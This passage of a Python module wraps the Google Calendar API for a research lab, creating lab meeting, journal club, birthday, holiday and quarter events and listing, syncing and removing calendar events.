presenters\n e['extendedProperties']['shared']['Food vendor'] = food_vendor\n e['extendedProperties']['shared']['Paper'] = paper\n participants = [p.strip() for p in [p for p in presenters.split(',')] if p and p.strip()]\n participants = [p for p in [self.email_map.get(p) for p in participants] if p]\n participant_names = [self.username_map.get(p.strip(), p.strip()) for p in presenters.split(',') if p.strip()]\n if participants:\n e['extendedProperties']['shared']['ParticipantList'] = ','.join(participants)\n if not e['summary']:\n e['summary'] = 'Journal club: %s' % (', '.join(participant_names))\n e['description'] = e['description'] or e['summary']\n return e\n\n\n # Notices calendar\n\n\n def create_birthday(self, celebrant, caker):\n e = self.initialize_tagged_copy()\n # summary is 
overwritten below\n e['extendedProperties']['shared']['event_type'] = 'Birthday'\n e['extendedProperties']['shared']['Celebrant'] = celebrant\n e['extendedProperties']['shared']['Bringer Of CAKE!'] = caker\n participants = [p for p in [self.email_map.get(celebrant), self.email_map.get(caker)] if p]\n if participants:\n e['extendedProperties']['shared']['ParticipantList'] = ','.join(participants)\n e['summary'] = \"%s's birthday\" % self.username_map.get(celebrant, celebrant)\n e['description'] = e['summary']\n e['gadget'] = {\n 'display' : 'icon',\n 'iconLink' : 'https://guybrush.ucsf.edu/images/cake.png',\n 'title' : e['summary'],\n }\n return e\n\n\n\n\n\nclass GoogleCalendar(object):\n ''' A class to interact with a set of Google calendars. This is used by our local lab website and by the meetings script.\n The class methods are split up following the API here:\n https://developers.google.com/resources/api-libraries/documentation/calendar/v3/python/latest/ '''\n\n\n @staticmethod\n def from_file(oauth_json_filepath, calendar_ids):\n return GoogleCalendar(read_file(oauth_json_filepath), calendar_ids)\n\n\n def __init__(self, oauth_json, calendar_ids):\n '''oauth_json is a JSON string which should contain login credentials for OAuth 2.0.\n calendar_ids is a list of calendar aliases to connect to and should be defined in oauth_json[\"calendars\"].\n We use calendar aliases e.g. \"main\" or \"biosensor meetings\" for convenience.\n '''\n oc = OAuthCredentials.from_JSON(oauth_json)\n configured_calendar_ids = NestedBunch.from_JSON(oauth_json).calendars\n for calendar_id in calendar_ids:\n assert(calendar_id in list(configured_calendar_ids.keys()))\n self.calendar_ids = calendar_ids\n\n # Request both read/write (calendar) and read-only access (calendar.readonly)\n credentials = SignedJwtAssertionCredentials(oc.client_email, oc.private_key, scope=['https://www.googleapis.com/auth/calendar', 'https://www.googleapis.com/auth/calendar.readonly'])\n http_auth = credentials.authorize(httplib2.Http())\n\n # Create a service object for the Google Calendar v3 API\n self.service = build('calendar', 'v3', http = http_auth)\n self.timezone_string = 'America/Los_Angeles'\n self.timezone = pytz.timezone(self.timezone_string)\n self.configured_calendar_ids = configured_calendar_ids\n\n\n # Access control lists (acl)\n\n\n def get_acl_list(self, calendar_id):\n return self.service.acl().list(calendarId = self.configured_calendar_ids[calendar_id]).execute() # note: not using pagination here yet\n\n def get_calendar_users(self, calendar_id):\n users = {}\n acl_list = self.get_acl_list(calendar_id)\n if acl_list:\n for item in acl_list['items']:\n nb = DeepNonStrictNestedBunch(item)\n users[nb.role] = users.get(nb.role, [])\n if nb.scope.type == 'user':\n if nb.scope.value.find('@group.calendar.google.com') == -1 and nb.scope.value.find('@developer.gserviceaccount.com') == -1:\n users[nb.role].append(nb.scope.value)\n users[nb.role] = sorted(users[nb.role])\n return DeepNonStrictNestedBunch(users)\n\n\n # Calendar list (calendarList)\n\n\n def get_calendars(self):\n calendars = []\n cl = self.service.calendarList().list().execute()\n for c in cl.get('items', []):\n nb = DeepNonStrictNestedBunch(c)\n calendars.append(nb)\n return calendars\n\n\n def get_calendar(self, calendar_id):\n return DeepNonStrictNestedBunch(self.service.calendarList().get(calendarId = self.configured_calendar_ids[calendar_id]).execute())\n\n\n # Calendar and event colors (colors)\n\n\n def get_colors(self):\n clrs = 
self.service.colors().get().execute()\n pprint.pprint(clrs)\n\n\n\n # Calendar events (events)\n\n def get_events_within_a_given_month(self, year, month, day = 1, hour = 0, minute = 0, second = 0):\n now = datetime.now(tz=self.timezone) # timezone?\n start_time = datetime(year=year, month=month, day=day, hour=hour, minute=minute, second=second, tzinfo=self.timezone)\n if start_time.month == 12:\n end_time = datetime(year = start_time.year, month = 12, day = 31, hour=23, minute=59, second=59, tzinfo=self.timezone)\n else:\n end_time = datetime(year = start_time.year, month = start_time.month + 1, day = 1, hour=0, minute=0, second=0, tzinfo=self.timezone)\n end_time = end_time - timedelta(seconds = 1)\n start_time = start_time.isoformat()\n end_time = end_time.isoformat()\n return self.get_events(start_time, end_time)\n\n\n def get_upcoming_events_within_the_current_month(self):\n now = datetime.now(tz=self.timezone) # timezone?\n return self.get_events_within_a_given_month(now.year, now.month, day = now.day, hour = now.hour, minute = now.minute, second = now.second)\n\n\n def get_upcoming_event_lists_for_the_remainder_of_the_month(self, year = None, month = None):\n '''Return the set of events as a triple of (today's events, events for the remainder of the week, events for the remainder of the month).'''\n\n events = []\n if year is None and month is None:\n now = datetime.now(tz=self.timezone) # timezone?\n else:\n now = datetime(year=year, month=month, day=1, hour=0, minute=0, second=0, tzinfo=self.timezone)\n\n # Get today's events, including past events\n start_time = datetime(year=now.year, month=now.month, day=now.day, hour=0, minute=0, second=0, tzinfo=self.timezone)\n end_time = datetime(year = start_time.year, month = start_time.month, day = start_time.day, hour=23, minute=59, second=59, tzinfo=self.timezone)\n events.append(self.get_events(start_time.isoformat(), end_time.isoformat()))\n\n # Get this week's events\n if now.weekday() < 6:\n # use timedelta for the day increment so month/year rollover is handled\n start_time = datetime(year=now.year, month=now.month, day=now.day, hour=0, minute=0, second=0, tzinfo=self.timezone) + timedelta(days = 1)\n end_time = start_time + timedelta(days = 6 - now.weekday())\n # We do still want to return events in the next month if they fall within this week. 
Otherwise we would clamp end_time back to the month boundary, as in the disabled code below:\n #if end_time.month != now.month:\n # end_time = end_time - timedelta(days = end_time.day)\n # end_time = datetime(year = end_time.year, month = end_time.month, day = end_time.day, hour=23, minute=59, second=59, tzinfo=self.timezone)\n #else:\n end_time = end_time + timedelta(seconds = -1)\n #end_time = datetime(year = end_time.year, month = end_time.month, day = end_time.day - 1, hour=23, minute=59, second=59, tzinfo=self.timezone)\n events.append(self.get_events(start_time.isoformat(), end_time.isoformat()))\n else:\n events.append([])\n\n # Get the remaining events in the month\n start_time = end_time + timedelta(seconds = 1)\n if start_time.month == now.month:\n if now.month == 12:\n end_time = datetime(year = start_time.year, month = 12, day = 31, hour=23, minute=59, second=59, tzinfo=self.timezone)\n else:\n end_time = datetime(year = start_time.year, month = start_time.month + 1, day = 1, hour=0, minute=0, second=0, tzinfo=self.timezone)\n end_time = end_time - timedelta(seconds = 1)\n events.append(self.get_events(start_time.isoformat(), end_time.isoformat()))\n else:\n events.append([])\n\n return events\n\n\n def get_upcoming_events_within_the_current_week(self):\n '''Returns the events from the calendar from now until the end of the current week (Sunday).'''\n now = datetime.now(tz=self.timezone) # timezone?\n start_time = datetime(year=now.year, month=now.month, day=now.day, hour=now.hour, minute=now.minute, second=now.second, tzinfo=self.timezone)\n end_time = start_time + timedelta(days = 6 - now.weekday())\n end_time = datetime(year = end_time.year, month = end_time.month, day = end_time.day, hour=23, minute=59, second=59, tzinfo=self.timezone)\n assert(end_time.weekday() == 6)\n start_time = start_time.isoformat()\n end_time = end_time.isoformat()\n return self.get_events(start_time, end_time)\n\n\n def get_upcoming_events_for_today(self):\n return self.get_upcoming_events(1)\n\n\n def get_upcoming_events(self, days_to_look_ahead):\n '''Returns the events from the calendar for the next days_to_look_ahead days.'''\n now = datetime.now(tz=self.timezone) # timezone?\n start_time = datetime(year=now.year, month=now.month, day=now.day, hour=now.hour, minute=now.minute, second=now.second, tzinfo=self.timezone)\n end_time = start_time + timedelta(days = days_to_look_ahead)\n start_time = start_time.isoformat()\n end_time = end_time.isoformat()\n return self.get_events(start_time, end_time)\n\n\n def get_event(self, calendar_id, event_id):\n event = self.service.events().get(calendarId = self.configured_calendar_ids[calendar_id], eventId=event_id).execute()\n nb = DeepNonStrictNestedBunch(event)\n dt = None\n if nb.start.dateTime:\n dt = dateutil.parser.parse(nb.start.dateTime)\n elif nb.start.date:\n dt = dateutil.parser.parse(nb.start.date)\n dt = datetime(year = dt.year, month = dt.month, day = dt.day, hour=0, minute=0, second=0, tzinfo=self.timezone)\n if dt:\n nb.datetime_o = dt\n nb.calendar_id = calendar_id\n return nb\n\n\n def get_events(self, start_time, end_time, ignore_cancelled = True, get_recurring_events_as_instances = True, restrict_to_calendars = []):\n '''A wrapper for events().list. Returns the events from the calendar within the specified times. 
Some of the interesting fields are:\n description, end, htmlLink, location, organizer, start, summary\n\n Note: \"Cancelled instances of recurring events (but not the underlying recurring event) will still be included if showDeleted and singleEvents are both False.\"\n '''\n es = []\n calendar_ids = restrict_to_calendars or self.calendar_ids\n for calendar_id in calendar_ids:\n now = datetime.now(tz = self.timezone)\n events = []\n page_token = None\n while True:\n events = self.service.events().list(pageToken=page_token, maxResults = 250, calendarId = self.configured_calendar_ids[calendar_id], timeMin = start_time, timeMax = end_time, showDeleted = False).execute()\n for event in events['items']:\n dt = None\n nb = DeepNonStrictNestedBunch(event)\n assert(not(nb._event))\n nb._event = event # keep the original event as returned in case we want to reuse it e.g. insert it into another calendar\n if (not ignore_cancelled) or (nb.status != 'cancelled'):\n # Ignore cancelled events\n if nb.recurrence:\n if get_recurring_events_as_instances:\n # Retrieve all occurrences of the recurring event within the timeframe\n es += self.get_recurring_events(calendar_id, nb.id, start_time, end_time)\n else:\n es.append(nb)\n elif nb.start.dateTime:\n dt = dateutil.parser.parse(nb.start.dateTime)\n elif nb.start.date:\n dt = dateutil.parser.parse(nb.start.date)\n dt = datetime(year = dt.year, month = dt.month, day = dt.day, hour=0, minute=0, second=0, tzinfo=self.timezone)\n if dt:\n nb.datetime_o = dt\n nb.calendar_id = calendar_id\n es.append(nb)\n page_token = events.get('nextPageToken')\n if not page_token:\n break\n\n es.sort(key=lambda x: x.datetime_o)\n return es\n\n\n def get_recurring_events(self, calendar_id, event_id, start_time, end_time, maxResults = None):\n '''A wrapper for events().instances. Returns the list of recurring events for the given calendar alias within the specified timeframe.'''\n es = []\n page_token = None\n while True:\n events = self.service.events().instances(calendarId = self.configured_calendar_ids[calendar_id], eventId = event_id, pageToken=page_token, timeMin = start_time, timeMax = end_time, maxResults = maxResults, showDeleted = False).execute()\n for event in events['items']:\n dt = None\n nb = DeepNonStrictNestedBunch(event)\n assert(not(nb._event))\n nb._event = event # keep the original event as returned in case we want to reuse it e.g. insert it into another calendar\n if nb.start.date:\n dt = dateutil.parser.parse(nb.start.date + 'T00:00:00-08:00')\n elif nb.start.dateTime:\n dt = dateutil.parser.parse(nb.start.dateTime)\n nb.datetime_o = dt\n nb.calendar_id = calendar_id\n es.append(nb)\n page_token = events.get('nextPageToken')\n if not page_token:\n break\n return es\n\n\n # Administration\n #### Quarters and holiday creation: main calendar\n\n\n def add_company_quarter(self, company_name, quarter_name, dt, calendar_id = 'notices'):\n '''Adds a company_name quarter event to the calendar. dt should be a date object. 
Returns True if the event was added.'''\n\n assert(calendar_id in list(self.configured_calendar_ids.keys()))\n calendarId = self.configured_calendar_ids[calendar_id]\n\n quarter_name = quarter_name.title()\n quarter_numbers = {\n 'Spring' : 1,\n 'Summer' : 2,\n 'Fall' : 3,\n 'Winter' : 4\n }\n assert(quarter_name in list(quarter_numbers.keys()))\n\n start_time = datetime(year=dt.year, month=dt.month, day=dt.day, hour=0, minute=0, second=0, tzinfo=self.timezone) + timedelta(days = -1)\n end_time = start_time + timedelta(days = 3, seconds = -1)\n summary = '%s %s Quarter begins' % (company_name, quarter_name)\n\n # Do not add the quarter multiple times\n events = self.get_events(start_time.isoformat(), end_time.isoformat(), ignore_cancelled = True)\n for event in events:\n if event.summary.find(summary) != -1:\n return False\n\n event_body = {\n 'summary' : summary,\n 'description' : summary,\n 'start' : {'date' : dt.isoformat(), 'timeZone' : self.timezone_string},\n 'end' : {'date' : dt.isoformat(), 'timeZone' : self.timezone_string},\n 'status' : 'confirmed',\n 'gadget' : {\n 'display' : 'icon',\n 'iconLink' : 'https://guybrush.ucsf.edu/images/Q%d_32.png' % quarter_numbers[quarter_name],\n 'title' : summary,\n },\n 'extendedProperties' : {\n 'shared' : {\n 'event_type' : '%s quarter' % company_name,\n 'quarter_name' : quarter_name\n }\n }\n }\n colortext.warning('\\n%s\\n' % pprint.pformat(event_body))\n created_event = self.service.events().insert(calendarId = self.configured_calendar_ids[calendar_id], body = event_body).execute()\n return True\n\n\n def add_holiday(self, start_dt, holiday_name, end_dt = None, calendar_id = 'notices'):\n '''Adds a holiday event to the calendar. start_dt and end_dt (if supplied) should be date objects. Returns True if the event was added.'''\n\n assert(calendar_id in list(self.configured_calendar_ids.keys()))\n calendarId = self.configured_calendar_ids[calendar_id]\n\n # Note: end_date is one day ahead e.g. for the New Years' holiday Dec 31-Jan 1st, we specify the end_date as Jan 2nd. This is what the calendar expects.\n if not end_dt:\n end_dt = start_dt\n start_date = date(year=start_dt.year, month=start_dt.month, day=start_dt.day)#, tzinfo=self.timezone)\n end_date = date(year=end_dt.year, month=end_dt.month, day=end_dt.day) + timedelta(days = 1) #, tzinfo=self.timezone)\n start_time = datetime(year=start_dt.year, month=start_dt.month, day=start_dt.day, hour=0, minute=0, second=0, tzinfo=self.timezone) + timedelta(days = -1)\n end_time = datetime(year=end_dt.year, month=end_dt.month, day=end_dt.day, hour=23, minute=59, second=59, tzinfo=self.timezone) + timedelta(days = 2)\n\n # Do not add the holiday multiple times\n events = self.get_events((start_time + timedelta(days = -1)).isoformat(), (end_time + timedelta(days = 1)).isoformat(), ignore_cancelled = True)\n for event in events:\n if event.summary.find(holiday_name) != -1:\n return False\n\n event_body = {\n 'summary' : holiday_name,\n 'description' : holiday_name,\n 'start' : {'date' : start_date.isoformat(), 'timeZone' : self.timezone_string},\n 'end' : {'date' : end_date.isoformat(), 'timeZone' : self.timezone_string},\n 'status' : 'confirmed',\n 'extendedProperties' : {\n 'shared' : {\n 'event_type' : 'Holiday'\n }\n }\n }\n if abs((end_date - start_date).days) > 7:\n raise Exception('The range of dates from {0} to {1} is greater than expected. 
Please check to make sure that the dates are correct.'.format(start_date, end_date))\n elif end_date < start_date:\n raise Exception('Error: The end date {1} occurs before the start date ({0}).'.format(start_date, end_date))\n\n created_event = self.service.events().insert(calendarId = self.configured_calendar_ids[calendar_id], body = event_body).execute()\n return True\n\n\n def remove_all_events(self, calendar_id):\n '''Removes all events from a calendar. WARNING: Be very careful using this.'''\n # todo: incomplete\n\n now = datetime.now(tz=self.timezone) # timezone?\n start_time = datetime(year=now.year - 1, month=now.month, day=now.day, hour=now.hour, minute=now.minute, second=now.second, tzinfo=self.timezone)\n end_time = datetime(year=now.year + 1, month=now.month, day=now.day, hour=now.hour, minute=now.minute, second=now.second, tzinfo=self.timezone)\n start_time = start_time.isoformat()\n end_time = end_time.isoformat()\n\n\n #events = self.service.events().list(calendarId = self.configured_calendar_ids[calendar_id], showDeleted = False).execute()\n events = self.service.events().list(calendarId = self.configured_calendar_ids[calendar_id], timeMin = start_time, timeMax = end_time, showDeleted = False).execute()\n\n print((len(events['items'])))\n\n for event in events['items']:\n dt = None\n nb = DeepNonStrictNestedBunch(event)\n #print(event)\n if (nb.summary or nb.description or '').find('presentation') != -1:\n print((nb.id))\n print((nb.summary or nb.description))\n print((nb.start))\n\n\n #### Meetings creation: main calendar\n\n # Tag events. This is all that is needed for the Rosetta development and regular meetings\n def tag_event(self, calendar_id, event_id, extendedProperties):\n '''Add extendedProperties to a meeting. Warning: extendedProperties must contain only shared and private dicts and\n their contents will overwrite anything in the event's extendedProperties i.e. 
we do *not* deep-merge the dicts.\n '''\n event_body = self.service.events().get(calendarId = self.configured_calendar_ids[calendar_id], eventId=event_id).execute()\n event_body['extendedProperties'] = event_body.get('extendedProperties', {})\n event_body['extendedProperties']['shared'] = event_body['extendedProperties'].get('shared', {})\n event_body['extendedProperties']['private'] = event_body['extendedProperties'].get('private', {})\n assert(sorted(set(extendedProperties.keys()).union(set(['shared', 'private']))) == ['private', 'shared'])\n for k, v in extendedProperties['shared'].items():\n event_body['extendedProperties']['shared'][k] = v\n for k, v in extendedProperties['private'].items():\n event_body['extendedProperties']['private'][k] = v\n raise Exception('not tested yet')\n updated_event = self.service.events().update(calendarId = self.configured_calendar_ids[calendar_id], eventId = event_id, body = event_body).execute()\n\n\n # Lab meetings\n def add_lab_meeting(self, calendar_id, start_dt, end_dt, location, presenters, foodie, summary = None, description = None, visibility = 'default', username_map = {}, email_map = {}):\n e = BasicEvent(self, start_dt, end_dt, location = location, summary = summary, description = description, visibility = visibility, username_map = username_map, email_map = email_map)\n event = e.create_lab_meeting('Lab meeting', presenters, foodie)\n colortext.warning(pprint.pformat(event))\n\n\n # Journal club meetings\n def add_journal_club_meeting(self, calendar_id, start_dt, end_dt, location, presenters, food_vendor, paper = None, summary = None, description = None, visibility = 'default', username_map = {}, email_map = {}):\n e = BasicEvent(self, start_dt, end_dt, location = location, summary = summary, description = description, visibility = visibility, username_map = username_map, email_map = email_map)\n event = e.create_journal_club_meeting(presenters, food_vendor, paper = paper)\n colortext.warning(pprint.pformat(event))\n\n\n # Kortemme/DeGrado labs joint meetings\n def add_kortemme_degrado_joint_meeting(self, calendar_id, start_dt, end_dt, location, presenters, summary = None, description = None, visibility = 'default', username_map = {}, email_map = {}):\n e = BasicEvent(self, start_dt, end_dt, location = location, summary = summary, description = description, visibility = visibility, username_map = username_map, email_map = email_map)\n event = e.create_lab_meeting('Kortemme/DeGrado joint meeting', presenters, locked = True)\n colortext.warning(pprint.pformat(event))\n\n\n #### Meetings creation: notices calendar\n\n\n def add_birthday(self, start_dt, end_dt, location, celebrant, caker, summary = None, description = None, visibility = 'default', username_map = {}, email_map = {}, calendar_id = 'notices'):\n e = BasicEvent(self, start_dt, end_dt, location = location, summary = summary, description = description, visibility = visibility, username_map = username_map, email_map = email_map)\n event_body = e.create_birthday(celebrant, caker)\n created_event = self.service.events().insert(calendarId = self.configured_calendar_ids[calendar_id], body = event_body).execute()\n return created_event\n\n # Deprecated - remove these when we switch over to the new system\n\n # Getters, deleters\n def getAllEvents(self, calendar_id, year = None, month = None):\n # See note above for query parameters\n\n #query = gdata.calendar.client.CalendarEventQuery()\n #query.max_results = 2**31-1\n #query.singleevents = \"true\"\n start_time = None\n end_time = None\n 
if year:\n if month and isinstance(month, int) and month >= 1 and month <= 12:\n # zero-pad the month so the timestamps are valid RFC3339 strings\n start_time = \"%d-%02d-01T00:00:00-08:00\" % (year, month)\n end_time = \"%d-%02d-31T23:59:00-08:00\" % (year, month)\n else:\n start_time = \"%d-01-01T00:00:00-08:00\" % year\n end_time = \"%d-12-31T23:59:00-08:00\" % year\n\n events = self.service.events().list(\n calendarId = self.configured_calendar_ids[calendar_id],\n timeMin = start_time,\n timeMax = end_time,\n singleEvents = True,\n maxResults = 2**31-1,\n showDeleted = False).execute()\n\n #print(query, self.URI)\n #feed = self.client.GetCalendarEventFeed(q=query, uri = self.URI)\n\n #events = []\n #for event in events:\n # events.append(event)\n # eventIDText = event.id.text\n # eventEditURL = event.GetEditLink().href\n # eventHTMLURL = event.GetHtmlLink().href\n return events.get('items')\n\n\n\n def getEventsTable(self, calendar_id, year = None, month = None):\n eventstbl = {}\n events = self.getAllEvents(calendar_id, year, month)\n for event in events:\n event = DeepNonStrictNestedBunch(event)\n if event.start and event.location and event.status != 'cancelled':\n EventTitle = event.summary\n\n if event.start.get('dateTime'):\n startdate = event.start['dateTime']\n startdate = time.strptime(startdate[0:19], '%Y-%m-%dT%H:%M:%S')\n startdate = datetime.fromtimestamp(time.mktime(startdate))\n elif event.start.get('date'):\n startdate = event.start['date']\n startdate = time.strptime(startdate, '%Y-%m-%d')\n startdate = datetime.fromtimestamp(time.mktime(startdate))\n else:\n raise Exception('Cannot determine start date.')\n if event.end.get('dateTime'):\n enddate = event.end['dateTime']\n enddate = time.strptime(enddate[0:19], '%Y-%m-%dT%H:%M:%S')\n enddate = datetime.fromtimestamp(time.mktime(enddate))\n elif event.end.get('date'):\n enddate = event.end['date']\n enddate = time.strptime(enddate, '%Y-%m-%d')\n enddate = datetime.fromtimestamp(time.mktime(enddate))\n else:\n raise Exception('Cannot determine end date.')\n\n isBirthday = EventTitle.find(\"birthday\") != -1\n\n location = event.get('location')\n eventstbl[(startdate, EventTitle)] = {\"event\": event, \"enddate\" : enddate, \"location\" : location, \"title\" : EventTitle}\n #for k in sorted(eventstbl.keys()):\n #\tprint(k, eventstbl[k][\"title\"])\n return eventstbl\n\n def updateEvents(self, calendar_id, newEvents):\n currentEvents = self.getEventsTable(calendar_id)\n\n #colortext.message(newEvents)\n #colortext.warning(currentEvents)\n\n # Events to remove\n toRemove = []\n for startdateTitle, event in sorted(currentEvents.items()):\n if event[\"title\"].find(\"birthday\") != -1:\n # Don't remove birthdays\n continue\n if newEvents.get(startdateTitle):\n newEvent = newEvents[startdateTitle]\n if newEvent[\"enddate\"] == event[\"enddate\"]:\n if event[\"location\"].startswith(newEvent[\"location\"]):\n if str(newEvent[\"title\"]) == str(event[\"title\"]):\n # Don't remove events which are in both newEvents and the calendar\n continue\n\n # Remove events which are on the calendar but not in newEvents\n toRemove.append(startdateTitle)\n\n # Events to add\n toAdd = []\n for startdateTitle, event in sorted(newEvents.items()):\n if currentEvents.get(startdateTitle):\n currentEvent = currentEvents[startdateTitle]\n if currentEvent[\"enddate\"] == event[\"enddate\"]:\n if currentEvent[\"location\"].startswith(event[\"location\"]):\n if str(currentEvent[\"title\"]) == str(event[\"title\"]):\n # Don't add events which are in both newEvents and the calendar\n continue\n # Add events which are in 
newEvents but not on the calendar\n toAdd.append(startdateTitle)\n\n if toRemove:\n colortext.error(\"Removing these %d events:\" % len(toRemove))\n for dtTitle in toRemove:\n colortext.warning(dtTitle)\n self.removeEvent(calendar_id, currentEvents[dtTitle][\"event\"].id)\n\n if toAdd:\n colortext.message(\"Adding these %d events:\" % len(toAdd))\n for dtTitle in toAdd:\n newEvent = newEvents[dtTitle]\n #print(dtTitle, newEvent)\n self.addNewEvent(calendar_id, dtTitle[0], newEvent[\"enddate\"], newEvent[\"location\"], newEvent[\"title\"])\n\n def removeEvent(self, calendar_id, event_id):\n for i in range(3):\n try:\n assert(self.service.events().get(calendarId = self.configured_calendar_ids[calendar_id], eventId = event_id).execute())\n self.service.events().delete(calendarId = self.configured_calendar_ids[calendar_id], eventId = event_id).execute()\n break\n except Exception as e:\n colortext.error(\"An error occurred:\")\n colortext.error(e)\n colortext.error(\"Trying again.\")\n time.sleep(2)\n\n def addNewEvent(self, calendar_id, startdate, enddate, location, title):\n colortext.message(\"\\nAdding %s on %s at %s\" % (title, startdate, location))\n\n #start_time = startdate.strftime('%Y-%m-%dT%H:%M:%S').isoformat()\n #end_time =\t enddate.strftime('%Y-%m-%dT%H:%M:%S').isoformat()\n start_time = startdate.isoformat()\n end_time =\t enddate.isoformat()\n\n loc = location\n if loc.startswith(\"Tahoe\"):\n loc = \"%s, 10 minutes outside Truckee, CA @ 39.328455,-120.184078\" % loc\n else:\n if location.startswith(\"BH \"):\n loc = \"%s, Byers Hall\" % loc\n loc = \"%s, removeEvent/Mission Bay, San Francisco, CA @ 37.767952,-122.392214\" % loc\n\n for i in range(3):\n try:\n self.service.events().insert(\n calendarId = self.configured_calendar_ids[calendar_id],\n body = {\n \"start\" : {\n \"timeZone\" : self.timezone_string,\n \"dateTime\" : start_time,\n },\n \"end\" : {\n \"timeZone\" : self.timezone_string,\n \"dateTime\" : end_time,\n },\n \"location\" : loc,\n \"summary\" : title,\n \"description\" : title\n }).execute()\n break\n except Exception as e:\n colortext.error(\"An error occurred:\")\n colortext.error(traceback.format_exc())\n colortext.error(e)\n colortext.error(\"Trying again.\")\n time.sleep(2)\n\n\n ### Birthdays - rewrite these functions\n\n def add_bidet(self):\n raise Exception('update')\n main_calendar = GoogleCalendar.from_file('/admin/calendars.json', ['main'])\n notices_calendar = GoogleCalendar.from_file('/admin/calendars.json', ['notices'])\n timezone = main_calendar.timezone\n event_ids = set()\n seen_notices = set()\n for year in range(2014, 2017):\n #for year in range(2014, 2015):\n colortext.message('\\n\\nTagging events in %d:\\n' % year)\n extra_days = 0\n if year % 4 == 0:\n extra_days = 1\n start_time = datetime(year=year, month=1, day=1, hour=0, minute=0, second=0, tzinfo=timezone)\n end_time = start_time + timedelta(days = 730 + extra_days, seconds = -1)\n start_time, end_time = start_time.isoformat(), end_time.isoformat()\n\n #main_meetings = main_calendar.get_events(start_time, end_time, ignore_cancelled = True, get_recurring_events_as_instances = False)\n #for m in main_meetings:\n # if m.extendedProperties.shared:\n # event_type = m.extendedProperties.shared['event_type']\n # if event_type == 'Birthday'\n\n notices = notices_calendar.get_events(start_time, end_time, ignore_cancelled = True, get_recurring_events_as_instances = False)\n for n in notices:\n if n.id in seen_notices:\n continue\n seen_notices.add(n.id)\n if n.extendedProperties.shared 
and n.extendedProperties.shared.event_type:\n event_type = n.extendedProperties.shared['event_type']\n if event_type == 'Birthday':\n print((n.summary, n.id))\n print((n.start))\n event_body = main_calendar.service.events().get(calendarId = main_calendar.configured_calendar_ids[\"notices\"], eventId=n.id).execute()\n event_body['gadget'] = {\n 'display' : 'icon',\n 'iconLink' : 'https://guybrush.ucsf.edu/images/cake.png',\n 'title' : n.summary,\n #'type' : 'application/x-google-gadgets+xml',\n }\n created_event = main_calendar.service.events().update(calendarId = main_calendar.configured_calendar_ids[\"notices\"], eventId = n.id, body = event_body).execute()\n\n\n\n def updateBirthdays(self, bdays):\n raise Exception('update')\n eventstbl = self.getEventsTable(\"main\")\n for dt, details in sorted(bdays.items()):\n bdaykey = datetime(dt.year, dt.month, dt.day)\n if eventstbl.get((bdaykey, details[\"title\"])):\n if str(eventstbl[(bdaykey, details[\"title\"])][\"title\"]) == str(details[\"title\"]):\n continue\n colortext.message(\"adding \" + details[\"title\"])\n self.addBirthday(dt, details[\"title\"], details[\"location\"])\n\n def addBirthday(self, dt, title, location):\n raise Exception('update')\n #if recurrence_data is None:\n # recurrence_data = ('DTSTART;VALUE=DATE:20070501\\r\\n'\n #\t+ 'DTEND;VALUE=DATE:20070502\\r\\n'\n #\t+ 'RRULE:FREQ=WEEKLY;BYDAY=Tu;UNTIL=20070904\\r\\n')\n raise Exception('add this functionality')\n dtstart =\"DATE:%d%0.2d%0.2dT070000\" % (dt.year, dt.month, dt.day)\n dtend =\"DATE:%d%0.2d%0.2dT235900\" % (dt.year, dt.month, dt.day)\n untildt =\"%d%0.2d%0.2d\" % (dt.year + 10, dt.month, dt.day)\n\n recurrence_data = ('DTSTART;VALUE=%s\\r\\n' % dtstart) + ('DTEND;VALUE=%s\\r\\n' % dtend) + ('RRULE:FREQ=YEARLY;UNTIL=%s\\r\\n' % untildt)\n\n event = gdata.calendar.data.CalendarEventEntry()\n event.title = atom.data.Title(text=title)\n event.content = atom.data.Content(text=title)\n event.where.append(gdata.calendar.data.CalendarWhere(value=location))\n\n # Set a recurring event\n event.recurrence = gdata.data.Recurrence(text=recurrence_data)\n self.addEvent(event)\n\n # Utility functions\n def printAllEvents(self, calendar_id, year = None):\n colortext.message('Events on Calendar: %s' % (self.get_calendar(calendar_id).summary))\n eventstbl = self.getEventsTable(calendar_id, year)\n for startdateTitle, details in sorted(eventstbl.items()):\n startdate = startdateTitle[0]\n print(((\"%s -> %s at %s: %s\" % (startdate, details[\"enddate\"], details[\"location\"][0:details[\"location\"].find(\"@\")], details[\"title\"])).encode('ascii', 'ignore')))\n\n\n\n\n def remove_all_cancelled_events(self, calendar_ids = []):\n\n for calendar_id in calendar_ids or self.calendar_ids:\n colortext.message('Removing cancelled events in %s' % calendar_id)\n events = self.service.events().list(calendarId = self.configured_calendar_ids[calendar_id]).execute()\n print((len(events['items'])))\n\n for event in events['items']:\n dt = None\n nb = DeepNonStrictNestedBunch(event)\n if nb.status == 'cancelled':\n if nb.recurringEventId:\n colortext.warning(nb.recurringEventId)\n # Retrieve all occurrences of the recurring event within the timeframe\n start_time = datetime(year=2010, month=1, day=1, tzinfo=self.timezone).isoformat()\n end_time = datetime(year=2015, month=1, day=1, tzinfo=self.timezone).isoformat()\n for e in self.get_recurring_events(calendar_id, nb.id, start_time, end_time, maxResults = 10):\n print(e)\n else:\n colortext.warning(nb)\n\n\nif __name__ == '__main__':\n 
import pprint\n gc = GoogleCalendar.from_file('test.json', ['main', 'rosetta_dev', 'regular_meetings', 'vacations'])\n\n tests = ['events']\n #'admin'\n # acl\n if 'acl' in tests:\n gc.get_calendar_users('main')\n\n # calendarList\n if 'calendarList' in tests:\n gc.get_calendars()\n v = gc.get_calendar('vacations')\n colortext.message('Description: %s' % v.description)\n colortext.warning('Role: %s' % v.accessRole)\n colortext.warning('Time zone: %s' % v.timeZone)\n\n # colors\n if 'colors' in tests:\n gc.get_colors()\n\n # events\n if 'events' in tests:\n for evnt in gc.get_upcoming_events_within_the_current_month():\n pass\n #print(evnt.datetime_o, evnt.description, evnt.location)\n\n colortext.warning('***')\n for evnt in gc.get_events_within_a_given_month(2014, 12):\n pass\n #print(evnt)\n #colortext.warning('%s, %s, %s' % (evnt.datetime_o, evnt.description or evnt.summary, evnt.location))\n\n colortext.warning('***')\n\n todays_events, this_weeks_events, this_months_events = gc.get_upcoming_event_lists_for_the_remainder_of_the_month(year = 2014, month = 12)\n sys.exit(0)\n colortext.warning(\"*** Today's events ***\")\n for evnt in todays_events:\n print((evnt.datetime_o, evnt.description, evnt.location))\n colortext.warning(\"*** This week's events ***\")\n for evnt in this_weeks_events:\n print((evnt.datetime_o, evnt.description, evnt.location))\n colortext.warning(\"*** This month's events ***\")\n for evnt in this_months_events:\n print((evnt.datetime_o, evnt.description, evnt.location))\n\n # admin\n if 'admin' in tests:\n 